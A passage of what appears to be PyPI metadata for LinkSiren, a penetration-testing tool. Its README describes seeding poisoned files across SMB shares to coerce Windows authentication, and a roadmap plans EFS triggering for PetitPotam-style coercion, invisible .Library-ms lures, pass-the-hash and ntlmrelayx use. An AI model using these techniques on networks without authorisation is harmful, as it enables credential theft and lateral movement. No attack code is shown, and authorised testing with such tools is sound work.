poisoned file in a sea of accessible shares.\r\n\r\nLinkSiren crawls accessible shares and ranks every subfolder based on the liklihood it will be opened by a user sometime soon. Then it uses this information to target malicious file distribution to multiple locations at once. Additionally, LinkSiren records the full UNC path of malicious files it creates, allowing for cleanup with a single command.\r\n\r\n### How will you make it even better?\r\nI'm looking to add the following features:\r\n- [ ] Add safety features:\r\n - [ ] Check if a file exists before overwriting it with a payload in deploy mode.\r\n - [ ] Check if files can be deleted from a target path before creating a payload there.\r\n- [ ] Add the ability to deploy files encrypted with EFS to trigger the start of the Encrypting File Service on Windows 11 machines so authentication can subsequently be coreced using tools like [Coercer](https://github.com/p0dalirius/Coercer) and [PetitPotam](https://github.com/topotam/PetitPotam).\r\n- [ ] Repackage for use with UV.\r\n- [ ] Add an option for 'invisible' targets for .Library-ms and .searchConnector-ms files where the icon is set to blank and the name is set to a non-printing, valid ASCII character.\r\n- [ ] Test for anonymous access to shares.\r\n- [ ] Enable authentication using a NTLM hash.\r\n- [ ] Enable ticket based authnentication (Kerberos).\r\n- [ ] Add pydantic validation for arguments including targets and output file names.\r\n- [ ] Test the tool through a socks proxy connection to an smb share generated using ntlmrelayx.\r\n\r\n### Disclaimer\r\nThis tools is designed for ethical hacking and penetration testing. It should be used exclusively on networks where explicit, written permission has been granted for testing. I accept no responsibility for the safety or effectiveness of this tool. Please don't sue me.\r\n",
"bugtrack_url": null,
"license": "BSD 3-Clause License Copyright (c) 2023, gjhami Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ",
"summary": "Generation, targeted deployment, and scalable cleanup for files that coerce Windows authentication.",
"version": "0.0.4",
"project_urls": {
"Homepage": "https://github.com/gjhami/LinkSiren",
"Issues": "https://github.com/gjhami/LinkSiren/issues"
},
"split_keywords": [
"coerce",
" pentest",
" windows",
" authentication",
" coercion"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "3821c6237f666f828c921d39969bcd9c0e4dc0d1a0213520a9b6b144dfe96dce",
"md5": "c86396b3ca56e4e02630ed12655d2fd8",
"sha256": "a556d98afa96bc9b09871a2219e6428a7a3b67b44c1237374c44d473514c8c7c"
},
"downloads": -1,
"filename": "linksiren-0.0.4-py3-none-any.whl",
"has_sig": false,
"md5_digest": "c86396b3ca56e4e02630ed12655d2fd8",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": ">=3.9",
"size": 29826,
"upload_time": "2025-01-20T16:41:19",
"upload_time_iso_8601": "2025-01-20T16:41:19.534212Z",
"url": "https://files.pythonhosted.org/packages/38/21/c6237f666f828c921d39969bcd9c0e4dc0d1a0213520a9b6b144dfe96dce/linksiren-0.0.4-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "823a4c11a22d3fc8349d7fadf565eea2e016b5612e0ca0faec93b04261c05005",
"md5": "e4146dcfe7cf5a268cd9522f902907d0",
"sha256": "ada6348cfe9d12db106d60f5c70c0a78f394d7da7f24dd94bd22f5df0912fb03"
},
"downloads": -1,
"filename": "linksiren-0.0.4.tar.gz",
"has_sig": false,
"md5_digest": "e4146dcfe7cf5a268cd9522f902907d0",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.9",
"size": 59555,
"upload_time": "2025-01-20T16:41:21",
"upload_time_iso_8601": "2025-01-20T16:41:21.412038Z",
"url": "https://files.pythonhosted.org/packages/82/3a/4c11a22d3fc8349d7fadf565eea2e016b5612e0ca0faec93b04261c05005/linksiren-0.0.4.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2025-01-20 16:41:21",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "gjhami",
"github_project": "LinkSiren",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"requirements": [
{
"name": "impacket",
"specs": [
[
">=",
"0.11.0"
]
]
},
{
"name": "tqdm",
"specs": [
[
">=",
"4.67.1"
]
]
}
],
"lcname": "linksiren"
}
